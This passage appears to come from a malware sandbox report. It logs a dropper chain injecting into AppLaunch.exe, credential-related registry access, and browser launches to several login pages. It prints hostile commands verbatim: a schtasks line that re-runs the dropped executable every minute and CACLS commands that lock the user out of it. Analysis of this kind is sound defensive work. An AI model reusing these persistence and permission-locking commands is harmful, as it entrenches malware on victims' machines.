PID 1528 wrote to memory of 4900 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\kd2hM38.exe C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1kQ67tv6.exe
PID 1528 wrote to memory of 4900 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\kd2hM38.exe C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1kQ67tv6.exe
PID 1528 wrote to memory of 4900 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\kd2hM38.exe C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1kQ67tv6.exe
PID 4900 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1kQ67tv6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4900 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1kQ67tv6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4900 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1kQ67tv6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4900 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1kQ67tv6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4900 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1kQ67tv6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4900 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1kQ67tv6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4900 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1kQ67tv6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4900 wrote to memory of 4764 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1kQ67tv6.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1528 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\kd2hM38.exe C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Vq7402.exe
PID 1528 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\kd2hM38.exe C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Vq7402.exe
PID 1528 wrote to memory of 1744 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\kd2hM38.exe C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Vq7402.exe
PID 1744 wrote to memory of 3684 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Vq7402.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1744 wrote to memory of 3684 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Vq7402.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1744 wrote to memory of 3684 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Vq7402.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1744 wrote to memory of 3684 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Vq7402.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1744 wrote to memory of 3684 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Vq7402.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1744 wrote to memory of 3684 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Vq7402.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1744 wrote to memory of 3684 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Vq7402.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1744 wrote to memory of 3684 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Vq7402.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1744 wrote to memory of 3684 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Vq7402.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1744 wrote to memory of 3684 N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Vq7402.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4496 wrote to memory of 4348 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\AX4Kl05.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Ze50cJ.exe
PID 4496 wrote to memory of 4348 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\AX4Kl05.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Ze50cJ.exe
PID 4496 wrote to memory of 4348 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\AX4Kl05.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Ze50cJ.exe
PID 4736 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\jh6MS90.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4DL487pw.exe
PID 4736 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\jh6MS90.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4DL487pw.exe
PID 4736 wrote to memory of 2520 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\jh6MS90.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4DL487pw.exe
PID 2520 wrote to memory of 1220 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4DL487pw.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2520 wrote to memory of 1220 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4DL487pw.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2520 wrote to memory of 1220 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4DL487pw.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2520 wrote to memory of 1220 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4DL487pw.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2520 wrote to memory of 1220 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4DL487pw.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2520 wrote to memory of 1220 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4DL487pw.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2520 wrote to memory of 1220 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4DL487pw.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2520 wrote to memory of 1220 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4DL487pw.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 4644 wrote to memory of 2420 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\TV5CN97.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5Ud5iK2.exe
PID 4644 wrote to memory of 2420 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\TV5CN97.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5Ud5iK2.exe
PID 4644 wrote to memory of 2420 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\TV5CN97.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5Ud5iK2.exe
PID 2420 wrote to memory of 3300 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5Ud5iK2.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 2420 wrote to memory of 3300 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5Ud5iK2.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 2420 wrote to memory of 3300 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5Ud5iK2.exe C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
PID 1076 wrote to memory of 1872 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\NH1rc74.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1076 wrote to memory of 1872 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\NH1rc74.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1076 wrote to memory of 1872 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\NH1rc74.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3300 wrote to memory of 4032 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\schtasks.exe
PID 3300 wrote to memory of 4032 N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe C:\Windows\SysWOW64\schtasks.exe

Uses Task Scheduler COM API

persistence

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\43B6.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\43B6.exe N/A

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\93a3be7f493345d46d47c94242dc697144cb76aca5e7924d4902a175315ef652.exe

"C:\Users\Admin\AppData\Local\Temp\93a3be7f493345d46d47c94242dc697144cb76aca5e7924d4902a175315ef652.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\NH1rc74.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\NH1rc74.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\TV5CN97.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\TV5CN97.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\jh6MS90.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\jh6MS90.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\AX4Kl05.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\AX4Kl05.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\kd2hM38.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\kd2hM38.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1kQ67tv6.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1kQ67tv6.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Vq7402.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Vq7402.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Ze50cJ.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Ze50cJ.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3684 -ip 3684

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3684 -s 540

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4DL487pw.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4DL487pw.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5Ud5iK2.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\5Ud5iK2.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6UM7BI7.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\6UM7BI7.exe

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7Br8CM55.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7Br8CM55.exe

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\9839.tmp\983A.tmp\983B.bat C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\7Br8CM55.exe"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffa308e46f8,0x7ffa308e4708,0x7ffa308e4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffa308e46f8,0x7ffa308e4708,0x7ffa308e4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffa308e46f8,0x7ffa308e4708,0x7ffa308e4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.steampowered.com/login/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffa308e46f8,0x7ffa308e4708,0x7ffa308e4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/i/flow/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffa308e46f8,0x7ffa308e4708,0x7ffa308e4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://steamcommunity.com/openid/loginform/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffa308e46f8,0x7ffa308e4708,0x7ffa308e4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2072,16679442828637804892,2898291932438764130,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.epicgames.com/id/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2164,2038615721056520531,2792217595779694562,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,2038615721056520531,2792217595779694562,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffa308e46f8,0x7ffa308e4708,0x7ffa308e4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2072,16679442828637804892,2898291932438764130,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2124 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,16679442828637804892,2898291932438764130,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2084 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,16679442828637804892,2898291932438764130,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3472 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,16679442828637804892,2898291932438764130,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,1010178720274360139,4736699656704367386,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2308 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,1010178720274360139,4736699656704367386,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2144 /prefetch:2

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,16679442828637804892,2898291932438764130,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3912 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,16679442828637804892,2898291932438764130,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3956 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2160,6433285236049913091,8242915451668633044,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,16679442828637804892,2898291932438764130,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4264 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1976,7412272707775161495,18263278470176872749,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 /prefetch:3

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,16679442828637804892,2898291932438764130,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4492 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,16679442828637804892,2898291932438764130,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4644 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,14260643946824829182,4871440183829336332,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,16679442828637804892,2898291932438764130,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5796 /prefetch:1

